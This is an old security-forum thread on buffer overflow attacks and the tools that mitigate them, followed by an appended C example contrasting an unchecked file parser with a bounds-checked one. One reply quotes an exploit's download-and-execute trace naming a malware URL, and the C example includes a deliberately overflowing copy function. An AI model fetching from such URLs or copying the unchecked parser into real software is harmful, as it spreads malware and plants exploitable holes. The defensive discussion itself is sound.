Buffer Overflow attacks?

Discussion in 'other anti-malware software' started by Rivalen, Oct 19, 2009.

Thread Status:
Not open for further replies.
  1. Rivalen

    Rivalen Registered Member

    Joined:
    Oct 18, 2005
    Posts:
    413
    I have an old PC with no DEP. How realistic are Buffer Overflow attacks?

    How can I protect myself? Are there freeware around that works?

    Comments would be great.

    Thanks
     
  2. Meriadoc

    Meriadoc Registered Member

    Joined:
    Mar 28, 2006
    Posts:
    2,642
    Location:
    Cymru
    Some come to mind :

    Heap/Stack Buffer Overflow Monitor
    Memory firewall/Comodo firewall
    WehnTrust
     
  3. Kyle1420

    Kyle1420 Registered Member

    Joined:
    May 27, 2008
    Posts:
    479
    Although BO's are bad.. AFAIK they are not malicious themselves, they open the door for malicious software/actions. I've noticed some AV's detect the result and sometimes the BO itself. (I found ThreatFire was particularly good at detecting BO's)

    I think that Comodo promotes its Memory Firewall a lot in marketing terms. Who else advertises this? "Memory Firewall and Buffer Overflows" Sounds technical aye :p

    I know that if I was a noob user and I heard of BO's and CMF for the first time I'd think.. "Hey! My AV doesn't say anything about protecting me from BO's! I'll get this right now to stay safe!"

    ++
    "Oh wait, Looks like I'll have to get the whole suite.. Doesn't come as a standalone program. * Uninstalls AV, Installs Comodo, Installs comodo's toolbar\DNS servers*"

    $$$... But of course that's what 99.99% of companies are all about.. It's understandable.
     
  4. trismegistos

    trismegistos Registered Member

    Joined:
    Jan 29, 2009
    Posts:
    365
    It is because a lot of malwares use 'exploits' taking advantage of certain buffer overflow or remote code execution vulnerabilities.

    To me as well as Rmus, buffer overflow vulnerabilities and remote or arbitrary code execution vulnerabilities are the same entities, differing in some techno-mumbo jumbo but always with the same end, ie, to 'get inside' or 'to escalate', etc.

    Such are the so called WMF buffer overflow and remote code execution vulnerabilities and exploits, Adobe PDF's, and almost all softwares have their vulnerabilities. Some are patched the sooner they are discovered.

    Regarding Hardware DEP, Comodo Memory Firewall as well as the Classical HIPS including sandboxing applications, I have tested all of them against wmf exploit POC's on a clean install unpatched system.

    The POC's simply tried to launch "notepad" or "calculator". Of course, real malwares will use exploits to do more than that, either the usual "download and exec" types w/c is where the money is (where the payloads are easy to detect and nullify using just default-deny policies or similar protections like AE) or anything and everything, w/c is the paranoid concern of mine and SSJ. ha ha

    Out of the 10 or more of the exploits (I can't remember anymore the exact number):

    1) with Hardware DEP, only successfully intercepted or prevented the executions of both "notepad" or "calculator" on two counts
    2) with Comodo Memory firewall, likewise intercepted two instances
    3) with a Classical HIPS, intercepted all executions except one explorer crash(so one failure?)
    4) with Sandboxie, all executions of "notepad" or "calculator" were sandboxed with one or two instances where the sandboxed explorer crashed(failure?)

    So in terms of descending order of effectiveness of mitigating buffer overflow or remote code execution's endpoint attacks (in our case the executions of "notepad" or "calculator" via exploits of the already patched old wmf vulnerabilities):

    Sandboxie =/> Classical HIPS > Comodo Memory Firewall =/> Hardware DEP

    In conclusion, Hardware DEP isn't effective as buffer overflow protection. Better use Sandboxie or any default-deny protections.
     
  5. trismegistos

    trismegistos Registered Member

    Joined:
    Jan 29, 2009
    Posts:
    365
    No problem bro. :)

    Hardware DEP is still very useful and I have it enabled. It would catch every now and then some attempts since I always tried to not update any softwares (including the web browsers) that might eat up space on the minuscule disk of my netbook. Probably, it's time for me to buy a new netbook. :)

    If only Hardware DEP were the Holy Grail, we may never have to need any anti-malwares (Sandboxie, etc) or any other anti-virus, or any software and operating system updates or patches.
     
  6. Rivalen

    Rivalen Registered Member

    Joined:
    Oct 18, 2005
    Posts:
    413
    Does free Antivir and Defensewall in combo take care of those exploits?
     
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Very real. They require an application/DLL that has a vulnerability, and a file to exploit that vulnerability.

    The earliest one I encountered was the Animated Cursor Buffer Overflow in 2004:

    Windows ANI File Parsing Buffer Overflow
    http://research.eeye.com/html/advisories/published/AD20050111.html
    November 15, 2004
    The website had code which downloaded the malformed ANI file. The ANI file caused the DLL to execute code inside the file to download malware:

    Code:
    urlmon.dll_URLDownloadToFileA_WinExec
    http://kunsthandel-schneider.de/daten/dlle.exe
    The recent PDF files exploited a vulnerability in a PDF reader. Running a malformed PDF file through Wepawet reveals the vulnerability and application:

    [Wepawet report screenshot: foxitPDF.gif]

    1) Protection against the buffer overflow itself: the malformed file is blocked from exploiting the vulnerability in the application. Several possibilities have already been discussed.

    2) Protection against the installation of the malware if the exploit attempts to download such stuff. Suggestions have already been made for this. This works when the exploit downloads malware.

    It can be argued that preventing 1) above is the most secure, since the exploit code has the potential to do almost anything (execute arbitrary code).

    Others argue that protection against 2) is adequate, since buffer exploits seen in the wild all have the purpose of downloading malware.

    As with all potential security exploits, you make a risk assessment and then decide what preventative measures give you the best peace of mind!

    regards,

    -rich
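As an added illustration (not code from the thread, from eEye, or from any product named here), this is the pattern behind a file-parsing buffer overflow like the ANI case Rmus describes: a parser that trusts a length field read from an untrusted file and copies it into a fixed stack buffer, beside the checked version that rejects the malformed file before anything is overwritten. The chunk layout, the `FIELD_MAX` size and the samples are constructed for the example and are not the real ANI or PDF structure.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 16   /* capacity of the fixed destination buffer (assumed) */

/* Constructed chunk layout: 4-byte little-endian declared length, then payload. */
static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Vulnerable pattern: the declared length is trusted, so a file that declares
 * more than FIELD_MAX bytes overruns 'out'. This is the corruption that DEP,
 * a memory firewall or a sandbox try to contain only after it has happened. */
int parse_chunk_unsafe(const uint8_t *data, size_t len, char out[FIELD_MAX]) {
    if (len < 4) return -1;
    uint32_t declared = read_le32(data);
    memcpy(out, data + 4, declared);          /* no bounds check at all */
    return (int)declared;
}

/* Hardened: validate the declared length against both the bytes actually
 * present in the file and the destination capacity before copying. */
int parse_chunk_safe(const uint8_t *data, size_t len, char out[FIELD_MAX]) {
    if (data == NULL || len < 4) return -1;   /* header missing */
    uint32_t declared = read_le32(data);
    if (declared > len - 4) return -2;        /* claims more than the file holds */
    if (declared > FIELD_MAX) return -3;      /* would overrun 'out' */
    memcpy(out, data + 4, declared);
    return (int)declared;                     /* bytes copied */
}

/* Builds a constructed chunk that declares 'declared' bytes but carries
 * 'payload' bytes of filler, then runs the checked parser on it. */
int run_case(uint32_t declared, size_t payload) {
    uint8_t buf[4 + 64];
    char out[FIELD_MAX];
    if (payload > 64) return -100;
    buf[0] = declared & 0xff;         buf[1] = (declared >> 8) & 0xff;
    buf[2] = (declared >> 16) & 0xff; buf[3] = (declared >> 24) & 0xff;
    memset(buf + 4, 'A', payload);
    return parse_chunk_safe(buf, 4 + payload, out);
}

int main(void) {
    printf("valid 5-byte field  -> %d\n", run_case(5, 5));       /* 5  */
    printf("claims 65535, has 4 -> %d\n", run_case(65535, 4));   /* -2 */
    printf("claims 32, has 32   -> %d\n", run_case(32, 32));     /* -3 */
    return 0;
}
```

The same three inputs handed to `parse_chunk_unsafe` would copy 5 bytes correctly, read far past the end of the file, and write 16 bytes beyond `out`, which is the point at which the later protection layers in this thread come into play.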
     